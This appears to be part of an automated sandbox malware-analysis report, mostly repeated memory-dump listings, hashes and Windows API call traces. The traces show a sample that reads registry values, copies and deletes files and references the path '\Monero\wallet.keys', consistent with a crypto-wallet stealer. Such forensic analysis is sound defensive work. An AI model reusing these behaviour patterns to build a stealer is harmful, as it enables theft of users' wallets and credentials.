                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 97e6b3a30a2952cf67cc5fe4c7f8aabc12827a7508bd9c71f9ad01a8f38745c7
                                • Instruction ID: 6e78d685c8d12dbf8b987746416c7380a92a9b90525219f497b146144c52b597
                                • Opcode Fuzzy Hash: 97e6b3a30a2952cf67cc5fe4c7f8aabc12827a7508bd9c71f9ad01a8f38745c7
                                • Instruction Fuzzy Hash: 28115EB2A44209EBDB14CF95ED49FBFBBB8FB48B14F104259F605A7280D77458009BA2
                                APIs
                                • StrStrA.SHLWAPI(00D0E960,?,?,?,0009140C,?,00D0E960,00000000), ref: 0009926C
                                • lstrcpyn.KERNEL32(002CAB88,00D0E960,00D0E960,?,0009140C,?,00D0E960), ref: 00099290
                                • lstrlen.KERNEL32(?,?,0009140C,?,00D0E960), ref: 000992A7
                                • wsprintfA.USER32 ref: 000992C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpynlstrlenwsprintf
                                • String ID: %s%s
                                • API String ID: 1206339513-3252725368
                                • Opcode ID: 0a92012b317c680d6c53b0401e8c9ac34ebd90da366eefed03eedccfa2ffe91f
                                • Instruction ID: df86f365501934db64641b33b05ace10a5ce835e9c9abfd6e55ed643a7c372f6
                                • Opcode Fuzzy Hash: 0a92012b317c680d6c53b0401e8c9ac34ebd90da366eefed03eedccfa2ffe91f
                                • Instruction Fuzzy Hash: 3501937550010CFFCB04DFECD988EAE7BB9EF58358F148248F9099B244C635AA509B91
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000812B4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 000812BB
                                • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 000812D7
                                • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 000812F5
                                • RegCloseKey.ADVAPI32(?), ref: 000812FF
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 64b78107429f73a689f237cb337e5e19aae0f460e4dedc479861fd3482634838
                                • Instruction ID: 7d006b3fc34906dcd3f97ed2a761d8170b98febb221998c3d0b58e799149703c
                                • Opcode Fuzzy Hash: 64b78107429f73a689f237cb337e5e19aae0f460e4dedc479861fd3482634838
                                • Instruction Fuzzy Hash: 1B01CDB9A4020CBBDB14DFE4EC4DFAEB7B8FB48705F108159FA0597280DA759A058B51
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: String___crt$Type
                                • String ID:
                                • API String ID: 2109742289-3916222277
                                • Opcode ID: bf243e2056a99847b97a0ed59b80adaffd3ed7020bdaf829de2f4f619130c3e6
                                • Instruction ID: 8729c89df01809fdca91195b4f9cc02226c6f373be00ed92c284a2a3d562faf4
                                • Opcode Fuzzy Hash: bf243e2056a99847b97a0ed59b80adaffd3ed7020bdaf829de2f4f619130c3e6
                                • Instruction Fuzzy Hash: 9B41D7B190079C5EEF318B24CD99FFBBBE89F45704F1444E8E9CA86182D2719A44EF60
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00096663
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                  • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                  • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                  • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00096726
                                • ExitProcess.KERNEL32 ref: 00096755
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                • String ID: <
                                • API String ID: 1148417306-4251816714
                                • Opcode ID: 69897c8bd0e75c587de9ae86e314d6ef9e31c6e2fc478cd6361f3a865c417bdd
                                • Instruction ID: 5068a3c48af066a837e5bfa3ecb44a157c04fabf981fcddf2c17d6b2737fec70
                                • Opcode Fuzzy Hash: 69897c8bd0e75c587de9ae86e314d6ef9e31c6e2fc478cd6361f3a865c417bdd
                                • Instruction Fuzzy Hash: BB314FB1D01218ABDB14EB90DC96FDEB778AF04300F404189F30A66192DF746B49DFAA
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,000A0E28,00000000,?), ref: 0009882F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00098836
                                • wsprintfA.USER32 ref: 00098850
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesslstrcpywsprintf
                                • String ID: %dx%d
                                • API String ID: 1695172769-2206825331
                                • Opcode ID: 51fc1c880ead9c8b72d052df01df006b059c443a8d0685ca38d1e37b32abf42b
                                • Instruction ID: 879a9f0c313e59f4581bea3ae116c8b1263dd94774be4561b54cd162b332f8b6
                                • Opcode Fuzzy Hash: 51fc1c880ead9c8b72d052df01df006b059c443a8d0685ca38d1e37b32abf42b
                                • Instruction Fuzzy Hash: 6F210DB1E44208AFDB04DFD4ED49FAEBBB8FB49715F104219F605A7290C779A901CBA1
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0009951E,00000000), ref: 00098D5B
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00098D62
                                • wsprintfW.USER32 ref: 00098D78
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesswsprintf
                                • String ID: %hs
                                • API String ID: 769748085-2783943728
                                • Opcode ID: d5357653e6c0044a628c738429191ab1f5131ae15703216ae668bc014dd009e2
                                • Instruction ID: 19472a941a6435e7f3fb3319c938c7fb8a8618dd243d754d66cad4a99d0d7e6c
                                • Opcode Fuzzy Hash: d5357653e6c0044a628c738429191ab1f5131ae15703216ae668bc014dd009e2
                                • Instruction Fuzzy Hash: FAE08CB0A4020CBBD700DBD4EC0EE6DB7B8EB0470AF000195FE0987280DA719E008B96
                                APIs
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                  • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                  • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                  • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                  • Part of subcall function 00098B60: GetSystemTime.KERNEL32(000A0E1A,00D0E0B0,000A05AE,?,?,000813F9,?,0000001A,000A0E1A,00000000,?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 00098B86
                                  • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                  • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0008A2E1
                                • lstrlen.KERNEL32(00000000,00000000), ref: 0008A3FF
                                • lstrlen.KERNEL32(00000000), ref: 0008A6BC
                                  • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                • DeleteFileA.KERNEL32(00000000), ref: 0008A743
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: a254debb05e908b7fd19d9a590751c41f68b651aa77a52c8cb1d3d3f26ea5866
                                • Instruction ID: 0951a69f88985f8cc737806bacd5365ea56854e4ac75fe9c43b6514d6420fe25
                                • Opcode Fuzzy Hash: a254debb05e908b7fd19d9a590751c41f68b651aa77a52c8cb1d3d3f26ea5866
                                • Instruction Fuzzy Hash: 74E1CC72A201189BDF05FBA4EC96EEE7338BF15300F508159F51676092EF306A4DDBA6
                                APIs
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                  • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                  • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                  • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                  • Part of subcall function 00098B60: GetSystemTime.KERNEL32(000A0E1A,00D0E0B0,000A05AE,?,?,000813F9,?,0000001A,000A0E1A,00000000,?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 00098B86
                                  • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                  • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0008D481
                                • lstrlen.KERNEL32(00000000), ref: 0008D698
                                • lstrlen.KERNEL32(00000000), ref: 0008D6AC
                                • DeleteFileA.KERNEL32(00000000), ref: 0008D72B
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: d29c07259d55355d42f0dae2e47215566039dcde89dd2e05873ace5e9027a032
                                • Instruction ID: ee45d612faf7cadd3d3a8838ef3ec733ddccce63551cc7cb03936c3a6fd22d2e
                                • Opcode Fuzzy Hash: d29c07259d55355d42f0dae2e47215566039dcde89dd2e05873ace5e9027a032
                                • Instruction Fuzzy Hash: 4391FE72A101189BDF04FBA4ED96EEE7338BF15304F504169F517A6092EF346A09DBA2
                                APIs
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                  • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                  • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                  • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                  • Part of subcall function 00098B60: GetSystemTime.KERNEL32(000A0E1A,00D0E0B0,000A05AE,?,?,000813F9,?,0000001A,000A0E1A,00000000,?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 00098B86
                                  • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                  • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0008D801
                                • lstrlen.KERNEL32(00000000), ref: 0008D99F
                                • lstrlen.KERNEL32(00000000), ref: 0008D9B3
                                • DeleteFileA.KERNEL32(00000000), ref: 0008DA32
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: 023b283c35af119896501a62402d2f16bd8e9baf5325127574e4770984287ccd
                                • Instruction ID: f7339bb11165456b1b673d0d827a205b40c1856f36a8095c4cc1f9cd384d5e44
                                • Opcode Fuzzy Hash: 023b283c35af119896501a62402d2f16bd8e9baf5325127574e4770984287ccd
                                • Instruction Fuzzy Hash: CE81E072A201189BDF04FBA4DD96EEE7338BF15304F504519F507A6092EF346A09DBE2
                                APIs
                                  • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                  • Part of subcall function 000899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000899EC
                                  • Part of subcall function 000899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00089A11
                                  • Part of subcall function 000899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00089A31
                                  • Part of subcall function 000899C0: ReadFile.KERNEL32(000000FF,?,00000000,0008148F,00000000), ref: 00089A5A
